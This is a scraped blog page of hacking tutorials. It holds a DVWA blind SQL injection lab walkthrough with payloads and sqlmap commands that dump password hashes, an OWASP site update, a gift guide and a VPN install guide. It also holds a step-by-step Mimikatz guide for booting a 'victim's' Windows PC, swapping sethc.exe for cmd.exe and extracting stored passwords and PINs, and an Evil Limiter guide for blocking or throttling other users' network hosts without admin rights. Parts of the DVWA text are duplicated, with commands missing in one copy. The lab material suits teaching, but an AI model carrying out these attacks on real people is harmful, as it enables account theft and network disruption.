Friday, June 12, 2020
Thursday, June 11, 2020
Learning Web Pentesting With DVWA Part 3: Blind SQL Injection
In this article we are going to do the SQL Injection (Blind) challenge of DVWA.
OWASP describes Blind SQL Injection as:
"Blind SQL (Structured Query Language) injection is a type of attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
OWASP describes Blind SQL Injection as:
"Blind SQL (Structured Query Language) injection is a type of attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is nearly identical to normal , the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible."
To follow along click on the SQL Injection (Blind) navigation link. You will be presented with a page like this:
Lets first try to enter a valid User ID to see what the response looks like. Enter 1 in the User ID field and click submit. The result should look like this:
Lets call this response as valid response for the ease of reference in the rest of the article. Now lets try to enter an invalid ID to see what the response for that would be. Enter something like 1337 the response would be like this:
We will call this invalid response. Since we know both the valid and invalid response, lets try to attack the app now. We will again start with a single quote (') and see the response. The response we got back is the one which we saw when we entered the wrong User ID. This indicates that our query is either invalid or incomplete. Lets try to add an or statement to our query like this:
This returns a valid response. Which means our query is complete and executes without errors. Lets try to figure out the size of the query output columns like we did with the sql injection before in Learning Web Pentesting With DVWA Part 2: SQL Injection.
Enter the following in the User ID field:
Again we get a valid response lets increase the number to 2.
We get a valid response again lets go for 3.
We get an invalid response so that confirms the size of query columns (number of columns queried by the server SQL statement) is 2.
Lets try to get some data using the blind sql injection, starting by trying to figure out the version of dbms used by the server like this:
Since we don't see any output we have to extract data character by character. Here we are trying to guess the first character of the string returned by version() function which in my case is 1. You'll notice the output returns a valid response when we enter the query above in the input field.
Lets examine the query a bit to further understand what we are trying to accomplish. We know 1 is the valid user id and it returns a valid response, we append it to the query. Following 1, we use a single quote to end the check string. After the single quote we start to build our own query with the and conditional statement which states that the answer is true if and only if both conditions are true. Since the user id 1 exists we know the first condition of the statement is true. In the second condition, we extract first character from the version() function using the substring() function and compare it with the value of 1 and then comment out the rest of server query. Since first condition is true, if the second condition is true as well we will get a valid response back otherwise we will get an invalid response. Since my the version of mariadb installed by the docker container starts with a 1 we will get a valid response. Lets see if we will get an invalid response if we compare the first character of the string returned by the version() function to 2 like this:
And we get the invalid response. To determine the second character of the string returned by the version() function, we will write our query like this:
1' and substring(version(),2,2) = 1-- -
We get invalid response. Changing 1 to 2 then 3 and so on we get invalid response back, then we try 0 and we get a valid response back indicating the second character in the string returned by the version() function is 0. Thus we have got so for 10 as the first two characters of the database version. We can try to get the third and fourth characters of the string but as you can guess it will be time consuming. So its time to automate the boring stuff. We can automate this process in two ways. One is to use our awesome programming skills to write a program that will automate this whole thing. Another way is not to reinvent the wheel and try sqlmap. I am going to show you how to use sqlmap but you can try the first method as well, as an exercise.
Lets use sqlmap to get data from the database. Enter 1 in the User ID field and click submit.
Then copy the URL from the URL bar which should look something like this
http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit
Now open a terminal and type this command:
this will print the version of your sqlmap installation otherwise it will give an error indicating the package is not installed on your computer. If its not installed then go ahead and install it.
Now type the following command to get the names of the databases:
Here replace the PHPSESSID with your session id which you can get by right clicking on the page and then clicking inspect in your browser (Firefox here). Then click on storage tab and expand cookie to get your PHPSESSID. Also your port for dvwa web app can be different so replace the URL with yours.
The command above uses -u to specify the url to be attacked, --cookie flag specifies the user authentication cookies, and -p is used to specify the parameter of the URL that we are going to attack.
We will now dump the tables of dvwa database using sqlmap like this:
After getting the list of tables its time to dump the columns of users table like this:
And at last we will dump the passwords column of the users table like this:
Now you can see the password hashes.
As you can see automating this blind sqli using sqlmap made it simple. It would have taken us a lot of time to do this stuff manually. That's why in pentests both manual and automated testing is necessary. But its not a good idea to rely on just one of the two rather we should leverage power of both testing types to both understand and exploit the vulnerability.
By the way we could have used something like this to dump all databases and tables using this sqlmap command:
But obviously it is time and resource consuming so we only extracted what was interested to us rather than dumping all the stuff.
Also we could have used sqlmap in the simple sql injection that we did in the previous article. As an exercise redo the SQL Injection challenge using sqlmap.
2. sqlmap: http://sqlmap.org/
3. MySQL SUBSTRING() Function: https://www.w3schools.com/sql/func_mysql_substring.asp
We will call this invalid response. Since we know both the valid and invalid response, lets try to attack the app now. We will again start with a single quote (') and see the response. The response we got back is the one which we saw when we entered the wrong User ID. This indicates that our query is either invalid or incomplete. Lets try to add an or statement to our query like this:
' or 1=1-- -
Enter the following in the User ID field:
' or 1=1 order by 1-- -
' or 1=1 order by 2-- -
' or 1=1 order by 3-- -
Lets try to get some data using the blind sql injection, starting by trying to figure out the version of dbms used by the server like this:
1' and substring(version(), 1,1) = 1-- -
Lets examine the query a bit to further understand what we are trying to accomplish. We know 1 is the valid user id and it returns a valid response, we append it to the query. Following 1, we use a single quote to end the check string. After the single quote we start to build our own query with the and conditional statement which states that the answer is true if and only if both conditions are true. Since the user id 1 exists we know the first condition of the statement is true. In the second condition, we extract first character from the version() function using the substring() function and compare it with the value of 1 and then comment out the rest of server query. Since first condition is true, if the second condition is true as well we will get a valid response back otherwise we will get an invalid response. Since my the version of mariadb installed by the docker container starts with a 1 we will get a valid response. Lets see if we will get an invalid response if we compare the first character of the string returned by the version() function to 2 like this:
1' and substring(version(),1,1) = 2-- -
1' and substring(version(),2,2) = 1-- -
We get invalid response. Changing 1 to 2 then 3 and so on we get invalid response back, then we try 0 and we get a valid response back indicating the second character in the string returned by the version() function is 0. Thus we have got so for 10 as the first two characters of the database version. We can try to get the third and fourth characters of the string but as you can guess it will be time consuming. So its time to automate the boring stuff. We can automate this process in two ways. One is to use our awesome programming skills to write a program that will automate this whole thing. Another way is not to reinvent the wheel and try sqlmap. I am going to show you how to use sqlmap but you can try the first method as well, as an exercise.
Lets use sqlmap to get data from the database. Enter 1 in the User ID field and click submit.
Then copy the URL from the URL bar which should look something like this
http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit
Now open a terminal and type this command:
sqlmap --version
Now type the following command to get the names of the databases:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id
The command above uses -u to specify the url to be attacked, --cookie flag specifies the user authentication cookies, and -p is used to specify the parameter of the URL that we are going to attack.
We will now dump the tables of dvwa database using sqlmap like this:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa --tables
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa -T users --columns
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa -T users -C password --dump
As you can see automating this blind sqli using sqlmap made it simple. It would have taken us a lot of time to do this stuff manually. That's why in pentests both manual and automated testing is necessary. But its not a good idea to rely on just one of the two rather we should leverage power of both testing types to both understand and exploit the vulnerability.
By the way we could have used something like this to dump all databases and tables using this sqlmap command:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id --dump-all
Also we could have used sqlmap in the simple sql injection that we did in the previous article. As an exercise redo the SQL Injection challenge using sqlmap.
References:
1. Blind SQL Injection: https://owasp.org/www-community/attacks/Blind_SQL_Injection2. sqlmap: http://sqlmap.org/
3. MySQL SUBSTRING() Function: https://www.w3schools.com/sql/func_mysql_substring.asp
Continue reading
OWASP Web 2.0 Project Update
Some of you likely recall the talk back in 2016 or so of updating the OWASP Foundation website to not appear so much like a...well, a wiki. That talk was carried forward into 2017 and 2018 and, with each year, the proposal got pushed ahead as there were other, deeper projects to tackle. With the arrival of 2019 and a firm project plan under the guidance of Mike McCamon, Executive Director, we are finally moving toward a functioning, modern website that will be a whole lot less...wiki-like. The journey has been circuitous and, while we are not anywhere near complete, we have a set plan in place to bring it to fruition within the calendar year (second quarter of the year, actually).
TLDR: How Can You Help?
There are certainly ways in which you can get involved now. For instance, we are looking for a clean way to get wiki pages into GitHub markdown format for archival. I have done some work here but there are parsing issues with some of the tools. Do you know a good tool or have you done similar work? Also, are you or do you know a good designer, someone familiar with GitHub pages that can provide some useful help and feedback along the way? A Jekyll expert to help code a theme with a handful of templates would be a great addition. In addition, we could use website server admins who could help with assigning redirects to maintain search integrity. Finally, there will be a great many pages to move that we will also eventually need community involvement in.
So, What Have We Done?
Thus far we have researched various ideas for standing up a new site, including modifying the current wiki, spinning up our own web server, contracting a third party to host and build a new site, and also using existing infrastructure with our own content to launch a new face for OWASP. Our discussions led us to a familiar place, one that nearly every developer in the OWASP space is familiar with: GitHub.
In our conversations with GitHub, it became readily apparent that using the platform would be a win for the Foundation as well as GitHub. Nearly everyone who runs a project at OWASP (documentation or otherwise) uses GitHub. Because our target audience is also mostly developers we know that they are also very comfortable with the platform. And while GitHub has a number of high profile companies using their GitHub Pages, the use of the platform as the basis for the entire website of the number one non-profit foundation in the application security sector is a big draw.
We have run with that GitHub Pages idea and have spent internal manpower on a proof of concept. This proof of concept is less about the UX of the site than the functionality, the ability to utilize the authentication systems, and the ability to utilize automation to push out changes quickly.
Where Are We Now?
We are doing the final stages of website architecture. We are also planning what needs to be in the site, how the pieces will integrate with current projects and chapters, and how we might utilize the community to integrate the pieces so that we have a visually and functionally cohesive website that spans across multiple repositories.
What Is Next?
We will soon be looking for a modern website design that is responsive and clean. We will begin using the knowledge gained from our proof of concept to build out the internals of the website and then we will start implementing the highest traffic pages and administrative areas into the new platform. Once we have the big-ticket items moved we will start looking at what is left and moving over those pieces. The eventual goal would be to have a new, modern website for the future of OWASP while keeping the wiki as an archive of really useful information.
Related articles
Cracking Windows 8/8.1 Passwords With Mimikatz
You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...
Requirements:
- A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
- Mimikatz (Download | Blog)
- Physical Access to victim's machine
- A Working Brain in that Big Head (Download Here)
Steps:
1. First of all download mimikatz and put it in a pendrive.2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window
3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:
mkdir /media/win
ntfs-3g /dev/sda1 /media/win
[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.
4. Now navigate to the System32 folder using the following command
cd /media/win/Windows/System32
5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:
mv sethc.exe sethc.exe.bak
sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.
6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:
cp cmd.exe sethc.exe
[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality
7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.
8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this
9. Now navigate to your usb drive in my case its drive G:
10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)
11. Run mimikatz and type the following commands one after the other in sequence:
privilege::debug
token::elevate
vault::list
the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)
That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...
Hope you enjoyed the tutorial have fun :)
Read more
Top 10 Great Gifts For The Hacker In Your Life
Give gifts this holiday season that inspires your favorite hackers to make something great. Our ten top picks for gifts to make 'em smile are perfect for hackers of all styles, ages, and interests.
Holiday gift guides always struggle when faced with nailing down a list for hackers — that's because hackers are as diverse in their interests and fascinations as they are diverse in gender, color, size and everything else. Someone with a multi-focused set of curiosity and unique gifts for finding out what makes the crackable crack may seem like a daunting individual to stuff a stocking for … but don't fret. With a keen eye on the latest interests in hacker culture, we've got a gift guide that can make the hacker in your life smile as they enjoy using your gift to hack and explore throughout the coming year.
Anonymity online: The Onion Pi
One of the most popular "snake oil" (fake) privacy gadgets is the so-called "Tor in a box" — a plug-and-play gadget that promises to make you anonymous online. Nearly all of these are made by clueless charlatans whose products put you at risk for privacy and security breaches. But your favorite hacker can just make or build an "Onion Pi" for $69.95, and with this free tutorial.
Attribution Dice
With Attribution Dice ($20), anyone can be a high-priced security consultant, and predict breach headlines before PR firms have a chance to feed them to reporters! With every security breach, hackers roll their eyes when headlines and PR firms roll out the same old, same old terms, methods and culprits. Instead of rolling eyes, your hacker can roll the dice, and wow friends, family, and neighbors with their hacker cyber-powers.
21 Bitcoin Computer
Money is always a welcome gift. Give the gift of going hands-on with Bitcoin with the 21 Bitcoin Computer. "The 21 Bitcoin Computer is ideal for buying and selling digital goods and services. You can use it to create bitcoin-payable APIs, set up your own personal digital goods store, pay people to share your content online, or host online games of skill." It's not cheap ($395) and comes with controversy, but it's a cool toy with a lot of potential, and 21 Inc. is going to be releasing an open source package for the device soon.
Gentleman's Bogota Lockpicks and Clear Practice Lock
Conventional wisdom suggests that all hackers know how to pick locks, but can they do it in style? A perfect stocking stuffer for slick hackers of all genders is the Gentleman's Bogota lockpick set ($34.95). These featherweights pin discreetly to a collar, hat, sleeve, vest, hemline, or wherever they choose. If the hacker you're shopping for wants to learn to lockpick, or just brush up on technique, throw in the clever Clear Practice Lock ($34.95).
Inverse Path USB Armory
In this reviewer's opinion, every hacker should have a USB Armory in their stocking this year. The Inverse Path USB Armory ($130) is a little USB stick with an entire computer onboard (800MHz ARM processor, 512MB RAM), designed to be a portable platform for personal security applications — and lives up to its reputation as "the Swiss Army Knife of security devices."
Hack-A-Day Gift Card
The cornerstone of hacker culture Hack-A-Day has a store offering gift cards and merchandise a-plenty. In it, you'll find a Bukito portable 3D printer ($899.97), ever-popular Facedancer21 and Gootfet42, a low energy Bluetooth Arduino microcontroller called the Lightblue Bean, and the pocket-sized open source robot arm, Mearm.
Hackers 20th Anniversary Blu-Ray Edition
Hack the planet! The 20th anniversary of influential 1995 cyberpunk film "Hackers" was this year, and this cult classic got a special edition Blu-ray release, making it the must-have for the hackers in your life. The 20th anniversary "Hackers" Blu-ray features an hour-long "making of" documentary, rich video and audio transfer for the film itself, and interviews with: Cast members Matthew Lillard, Fisher Stevens, and Penn Jillette; hacking consultants Nicholas Jarecki and Emmanuel Goldstein; Director Iain Softley, and many more involved with the film's production and style.
A Hacker's hope for better sleep: The Re-Timer
Hackers are increasingly hacking themselves to make their own systems run better, and one thing hackers struggle with is their sleep cycles and feeling rested. Something that can help out is the Re-Timer ($299), a retro-future looking set of glasses and kit that adjusts the circadian rhythm and suppresses the body's production of melatonin (the sleepy hormone our bodies produce which makes us feel tired). Based on 25 years of research and on the market worldwide for three years, the Re-Timer has its own jet lag calculator app, as well as its Sleep App for Fitbit that makes a customized schedule based on actual sleep tracked.
USB Rubber Ducky Deluxe and LAN Turtle
A longtime favorite with hackers, penetration testers and IT professionals, the USB Rubber Ducky Deluxe ($42.99)is a cross-platform (Windows, Mac, Linux, Android) testing and experimentation device that is detected as a keyboard — imagine the possibilities. This stocking stuffer pairs well with its animal friend LAN Turtle ($50), a covert sysadmin and pentest tool for remote access, network intel gathering, and man-in-the-middle monitoring through a simple graphic shell (all in a generic USB ethernet adapter case).
TechShop Gift Certificate
Give the gift of hacking and making: A gift certificate to a TechShop. "Part fabrication and prototyping studio, part hackerspace, and part learning center, TechShop provides access to over $1 million worth of professional equipment and software. We offer comprehensive instruction and expert staff to ensure you have a safe, meaningful and rewarding experience." There are TechShops in Arizona, California, Michigan, Missouri, Pennsylvania, Texas, and Virginia/Washington, D.C. (some states have multiple locations). Future locations include St. Louis, MO and Paris, France.
Products to avoid
If you see these products, run! You're better off with a lump of coal. Don't waste precious holiday money on "snake oil" privacy and security products like these:
- Anonabox
- Wemagin
- Webcloak
- iGuardian (now SHIELD)
- LogMeOnce
- Sever: The Anti-Villain Box
Read more
Wednesday, June 10, 2020
How To Install Windscribe - The Best Free VPN On GNU/Linux Distros?
Why should you use Windscrive?
Windscribe is well-known for their free VPN service but they also have a paid version. Only with a free account, you will get 10 countries to connect through and change your real IP address and 10GB of free traffic (if you use an email to sign up Windscribe), and unlimited devices.
The Free version is awesome, but the Pro one is even better! With Pro version you will get Unlimited Data, Unblock over 60 Countries and 110 Cities, Config Generator (OpenVPN, IKEv2, SOCKS5), and full protection from R.O.B.E.R.T.
For your information, Windscribe is one of the best VPN services in the category Free Audit, Value Audit and Overall Audit in BestVPN.com Awards 2019 (Read the White Paper here). You totally can believe in Windscribe (100% no logs).
And about R.O.B.E.R.T, it's an advanced DNS level blocker that protects you from Malware, Ads and Trackers, Social tracking, Porn, Gambling, Fake News, Clickbait and Cryptominers. Read more about R.O.B.E.R.T.
Anyway, Windscribe helps you:
- Stop tracking and browse privately: Governments block content based on your location. Corporations track and sell your personal data. Get Windscribe and take back control of your privacy.
- Unblock geo-restricted content: Windscribe masks your IP address. This gives you unrestricted and private access to entertainment, news sites, and blocked content in over 45 different countries.
- Take your browsing history to your grave: Protect your browsing history from your network administrator, ISP, or your mom. Windscribe doesn't keep any logs, so your private data stays with you.
- Stop leaking personal information: Prevent hackers from stealing your data while you use public WIFI and block annoying advertisers from stalking you online.
- Go beyond basic VPN protection: For comprehensive privacy protection, use our desktop and browser combo (they're both free).
Windscribe also supports Chrome browser, Firefox browser, Opera browser, Smart TV, Routers, Android, iOS, BlackBerry, Windows OS, Mac OS X and GNU/Linux OS, you name it.
You can install Windscribe on Ubuntu, Debian, Fedora, CentOS, Arch Linux and their based distros too.
But to install and safely use Internet through Windscribe, you must sign up an account first. If you already have an account then let's get started.
How to install Windscribe on Arch and Arch-based distros?
First, open your Terminal.
For Arch Linux and Arch-based distro users, you can install Windscribe from AUR. Run these commands without root to download and install Windscribe on your Arch:
For other distro users, go to VPN for Linux - Windscribe choose the binary file that compatible with your distro (
.DEB for Debian and Ubuntu based, .RPM for Fedora and CentOS based) and then install it.dpkg -i [Windscribe .DEB package]
rpm -ivh [Windscribe .RPM package]
Or you can scroll down to Pick Your Distro, click to the distro version you use, or click to the distro version that your distro is based on and follow the instructions.
Now enter these commands to auto-start a and log in to Windscribe.
Enter your username and password and then you can enjoy Windscribe's free VPN service.
How to use Windscribe on Linux?
This is Windscribe list of commands (
windscribe --help):If you want Windscribe to chooses the best location for you, use
windscribe connect best.
But if you want to choose location yourself, here is the list of Windscribe's locations:
*Pro only
Example, i want to connect to "Los Angeles - Dogg", i use
windscribe connect Dogg.
If you want to stop connecting through Windscribe use
windscribe disconnect.
For some reasons, you want to log out Windscribe from your device, use
windscribe logout.I hope this article is helpful for you 😃
Related articles
Evil Limiter: Taking Control Of Your Network Bandwidth
Ever wanted to block someone from the network or limit their bandwidth without having the network admin privileges? Well Evil Limiter has got you covered then.
An amazing tool to help you control your network without having access to the admin panel.
Today I'm gonna show you how to use this interesting tool to take control of your network.
Requirements:
1. A PC or Laptop with Linux OS.2. A Network Adapter.
3. Access to the Network you want to control.
4. sudo or root access on your Linux OS.
First of all we will download the tool from its github repository:
https://github.com/bitbrute/evillimiter
You can download and extract the zip file from the link above or you can clone evillimiter repository using git like this:
git clone https://github.com/bitbrute/evillimiter
Now lets install the downloaded tool on our machine
Step 1: Move inside the downloaded github repository
cd evillimiter
Step 2: To install type
sudo python3 setup.py install
wait for the installation to finish (May take some time)
Step 3: To run type
sudo evilimiter
Voila! That's it, you got it up and running on your machine
Now how do you control your network with it, its very easy.
It should detect your network automatically but yeah you can set it up manually as well using the command line argument -i.
After you have selected the right interface to control, you need to scan your network for live hosts. To perform the scan type
scan
you can pass an optional flag to the scan command which is range which will help you to specify the range of ip addresses you want to scan like this
scan --range 192.168.1.1-192.168.1.100
The above command will scan a total of 100 hosts from 192.168.1.1 to 192.168.1.100
Now after you have scanned your network next thing is to list the hosts that have been discovered during the scan for that you type the hosts command like this
hosts
Now you know the hosts on your network and now you should know which host you wanna block or limit based on the mac address of the host. Remember the host id of the host that you want to block or limit bandwidth of and lets do the magic.
to block a host from using the internet we simply specify the block command followed by the host id of the host that we want to block like this
block 1
if instead of blocking the host we just want to limit his internet bandwidth we can do just that by using the limit command followed by the host id and then the bandwidth that we want to allocate to that particular host like this
limit 1 100kbits
Wohooo! yeah its that easy and yes you can do all this without having the network admin role.
Now if you want to show mercy on that poor guy (blocked host), you can set him free by using the free command followed by the host id like this:
free 1
Well isn't administrating your network bandwidth so easy now.
Hope you enjoyed this tutorial.:)
Subscribe to:
Posts (Atom)